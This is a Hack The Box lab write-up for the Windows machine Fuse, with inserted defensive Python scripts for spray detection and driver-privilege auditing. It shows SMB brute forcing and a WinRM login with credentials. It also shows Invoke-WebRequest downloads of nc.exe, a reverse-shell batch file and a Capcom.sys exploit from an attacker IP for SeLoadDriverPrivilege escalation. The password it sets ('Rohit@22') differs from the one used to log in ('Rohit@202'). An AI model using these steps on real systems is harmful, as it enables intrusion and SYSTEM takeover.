Fuse - Hack The Box

cY83rR0H1t
4 min read · May 22, 2022

Summary

Fuse is a medium-difficulty Windows machine on Hack The Box. An initial foothold is gained by discovering an expired password that gives access to SMB shares and rpcclient. A user shell is obtained by enumerating the printers in rpcclient and recovering a password used by one of the users. Administrative privileges are obtained by abusing SeLoadDriverPrivilege.

Enumeration

The port scan showed a lot of open ports.

Visiting port 80 redirects to http://fuse.fabricorp.local/papercut/logs/html/index.htm

The website hosts some Excel files containing data, including usernames.

I built my own user list from one of the Excel files found on port 80.

I then brute-forced SMB with this list to find a valid username and password.

The username bnielson with password Fabricorp01 authenticated, but the server asks for the password to be changed before it can be used.

We changed bnielson's password from Fabricorp01 to Rohit@22.
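From the defender's side, the SMB brute force above leaves a distinctive trail: one source address failing against many accounts in a short window, plus a 4625 whose sub-status says the password was actually right but account policy blocked the logon. The script below is an added example and not part of the original write-up; it runs over constructed Windows Security 4625 records (the user names other than bnielson, the addresses and the timestamps are made up) and flags both patterns.

```python
# Added example (not from the write-up): detect the password-spraying pattern
# in Windows Security 4625 (logon failure) events, and surface failures whose
# sub-status means the credential itself was valid. Sample records are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS sub-status codes carried in 4625 events.
SUBSTATUS = {
    0xC000006A: "wrong password",
    0xC0000064: "user does not exist",
    0xC0000071: "password expired",
    0xC0000224: "password must change at next logon",
}

SAMPLE_EVENTS = [  # constructed sample data, not logs from the box
    {"time": "2022-05-22T10:00:01", "ip": "10.10.14.11", "user": "alice", "status": 0xC000006A},
    {"time": "2022-05-22T10:00:02", "ip": "10.10.14.11", "user": "bob", "status": 0xC000006A},
    {"time": "2022-05-22T10:00:03", "ip": "10.10.14.11", "user": "carol", "status": 0xC0000064},
    {"time": "2022-05-22T10:00:04", "ip": "10.10.14.11", "user": "bnielson", "status": 0xC0000224},
    {"time": "2022-05-22T10:30:00", "ip": "10.10.10.50", "user": "alice", "status": 0xC000006A},
    {"time": "2022-05-22T10:31:00", "ip": "10.10.10.50", "user": "alice", "status": 0xC000006A},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def detect_spray(events, min_users=3, window=timedelta(minutes=5)):
    """Return {source_ip: sorted user list} for every source that failed
    against at least `min_users` distinct accounts inside `window`.
    A single user failing repeatedly (a typo) is not a spray."""
    by_ip = defaultdict(list)
    for event in events:
        by_ip[event["ip"]].append(event)

    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: parse_time(e["time"]))
        best = set()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits inside `window`.
            while parse_time(evs[end]["time"]) - parse_time(evs[start]["time"]) > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            hits[ip] = sorted(best)
    return hits


def near_misses(events):
    """Failures where the password was correct but policy blocked the logon.
    These tell an attacker (and the defender) that a credential is valid."""
    return [(e["user"], SUBSTATUS[e["status"]]) for e in events
            if e["status"] in (0xC0000071, 0xC0000224)]


if __name__ == "__main__":
    print(detect_spray(SAMPLE_EVENTS))
    print(near_misses(SAMPLE_EVENTS))
```

The thresholds (three users, five minutes) are assumptions to tune per environment; the point is that a "must change password" failure from a spraying source deserves the same attention as a success.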

Reference :

Enumerating RPC

We log in with the Rohit@202 password and get access. Once logged in, use the enumdomusers command to enumerate the users on the domain:

Enumerating the printers revealed a new password.

We have a new password but don't know which user it belongs to, so we brute-forced WinRM again to find the matching user.

The user svc-print turned out to be the right one.

Log in over WinRM to get a user shell.

#Command
$ ./evil-winrm.rb -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

Privilege Escalation

SeLoadDriverPrivilege

This is a very dangerous privilege to assign to any user: it allows the user to load kernel drivers and therefore execute code with kernel privileges, i.e. as NT AUTHORITY\SYSTEM. The abuse follows three steps:

  • Enable the SeLoadDriverPrivilege privilege
  • Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings
  • Execute the NtLoadDriver function, specifying the registry key previously created
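Two checks a defender would want for the technique just described: who actually holds SeLoadDriverPrivilege (on a domain controller, Administrators and Print Operators have it by default, and membership in the latter is easy to overlook), and whether any driver is being loaded from outside the normal driver directories. The script below is an added example, not code from the write-up; it parses a constructed secedit-style export (the "[Privilege Rights]" section of `secedit /export /cfg out.inf`) and constructed Sysmon Event ID 6 (DriverLoad) records. The expected-holder set, the domain SID and the signer string are assumptions.

```python
# Added example (not from the write-up): audit SeLoadDriverPrivilege holders
# from a secedit export and flag driver loads outside trusted directories in
# Sysmon Event ID 6 records. All inputs are constructed sample data.
WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-550": "BUILTIN\\Print Operators",
}

# Assumption: in this environment only Administrators should hold the right.
EXPECTED_HOLDERS = {"S-1-5-32-544"}

SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550,*S-1-5-21-1000-2000-3000-1105
SeShutdownPrivilege = *S-1-5-32-544
"""  # constructed; the domain SID S-1-5-21-1000-2000-3000-1105 is made up

# Constructed Sysmon Event ID 6 records (ImageLoaded / Signed / Signature).
SAMPLE_DRIVER_LOADS = [
    {"ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"ImageLoaded": "C:\\temp\\Capcom.sys",
     "Signed": "true", "Signature": "EXAMPLE-SIGNER (placeholder)"},
]

# Directories from which production drivers are normally loaded (assumption).
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)


def parse_privilege_rights(text):
    """Return {privilege_name: [SID, ...]} from the [Privilege Rights] section.
    secedit writes each SID with a leading '*', which is stripped here."""
    rights = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Privilege Rights" and "=" in line:
            name, _, value = line.partition("=")
            sids = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
            rights[name.strip()] = sids
    return rights


def unexpected_driver_loaders(text, expected=EXPECTED_HOLDERS):
    """List (SID, friendly name) for every SeLoadDriverPrivilege holder
    that is not in the expected set."""
    holders = parse_privilege_rights(text).get("SeLoadDriverPrivilege", [])
    return [(sid, WELL_KNOWN_SIDS.get(sid, "unknown principal"))
            for sid in holders if sid not in expected]


def suspicious_driver_loads(records):
    """Flag drivers loaded from outside trusted directories or unsigned.
    A valid signature alone is not enough: Capcom.sys is a signed driver
    that is abused precisely because it is signed and vulnerable."""
    flagged = []
    for rec in records:
        path = rec["ImageLoaded"].lower()
        in_trusted_dir = path.startswith(TRUSTED_DRIVER_DIRS)
        signed = rec.get("Signed", "").lower() == "true"
        if not in_trusted_dir or not signed:
            flagged.append(rec["ImageLoaded"])
    return flagged


if __name__ == "__main__":
    print(unexpected_driver_loaders(SAMPLE_INF))
    print(suspicious_driver_loads(SAMPLE_DRIVER_LOADS))
```

Running the first check against a real export is the quickest way to find accounts like svc-print that inherit the right through group membership; the second check pairs well with a blocklist of known vulnerable driver hashes, which this example leaves out because no hash is given on the page.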

In the screenshot below, I compiled the code into an .exe.

We uploaded EOPLOADDRIVER.exe and Capcom.sys to the box. With these two files, I can load the vulnerable driver. To get SYSTEM access, I also need a reverse shell that the exploit can execute.

  • netcat.bat — The reverse shell we created.
  • EOPLOADDRIVER.exe — The EOPLOADDRIVER.exe which we compiled with Visual Studio
  • ExploitCapcomrohit.exe — The exploit code we modified to call our reverse shell
  • Capcom.sys — The driver that we have selected to exploit.

We transferred all the files to the target box.

#Command
$ Invoke-WebRequest "http://10.10.14.11:8000/Capcom.sys" -OutFile C:\temp\Capcom.sys
$ Invoke-WebRequest "http://10.10.14.11:8000/EOPLOADDRIVER.exe" -OutFile C:\temp\EOPLOADDRIVER.exe
$ Invoke-WebRequest "http://10.10.14.11:8080/ExploitCapcom.exe" -OutFile C:\temp\ExploitCapcomrohit.exe
$ Invoke-WebRequest "http://10.10.14.11:8080/nc.exe" -OutFile C:\temp\nc.exe
$ Invoke-WebRequest "http://10.10.14.11:8080/netcat.bat" -OutFile C:\temp\netcat.bat

Code:

First, we load the driver. Once Capcom.sys is loaded, it's time to start the exploit (ExploitCapcomrohit.exe).

ExploitCapcomrohit.exe references netcat.bat in its code; netcat.bat is where I wrote my reverse shell command.

I changed the original line in the exploit code (line 292) from
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
TCHAR CommandLine[] = TEXT("C:\\temp\\netcat.bat");
(the backslashes must be doubled in the C string literal, otherwise \t and \n are read as escape sequences).

Here we got a root shell.

Reference :

Thanks for reading.

Hack The Box Profile: https://www.hackthebox.eu/profile/116842

cY83rR0H1t

MSc CyberSecurity |Cybersecurity researcher | OSCP | CRTO | CRTP |eCPPTv2 | eJPT | Hack The Box player | CTF player |